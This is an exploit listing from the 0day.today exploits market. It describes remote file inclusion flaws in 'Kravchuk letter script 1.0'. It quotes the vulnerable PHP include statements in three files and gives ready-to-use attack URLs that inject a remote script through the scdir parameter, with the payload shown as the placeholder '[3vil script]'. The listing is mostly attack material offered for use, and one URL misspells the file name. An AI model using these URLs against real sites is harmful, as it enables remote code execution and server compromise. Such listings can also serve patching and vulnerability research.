[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Kravchuk letter script 1.0 (scdir) Remote File Inclusion Vulnerabilities

Author
xoron
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1932
Category
web applications
Date add
04-06-2007
Platform
unsorted
========================================================================
Kravchuk letter script 1.0 (scdir) Remote File Inclusion Vulnerabilities
========================================================================



++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++
+   K-letter 1.0 << Remote File include                             +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   Cyber-warrior.org <<< sanal alemin DEV.                         +
+                                                                   +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   ERROR [1];  action.php?                                         +
+              include ($scdir."admin/config.inc.php");             +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   BUG                                                             +
+   www.target.com/path/acrion.php?scdir=[3vil script]              +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   ERROR [2];  subs.php?                                           +
+              include $scdir."admin/config.inc.php";               +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   BUG                                                             +
+   www.target.com/path/subs.php?scdir=[3vil script]                +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   ERROR [3];  unsubs.php?                                         +
+              include $scdir."admin/config.inc.php";               +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   BUG                                                             +
+   www.target.com/path/unsubs.php?scdir=[3vil script]              +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



#  0day.today [2024-12-25]  #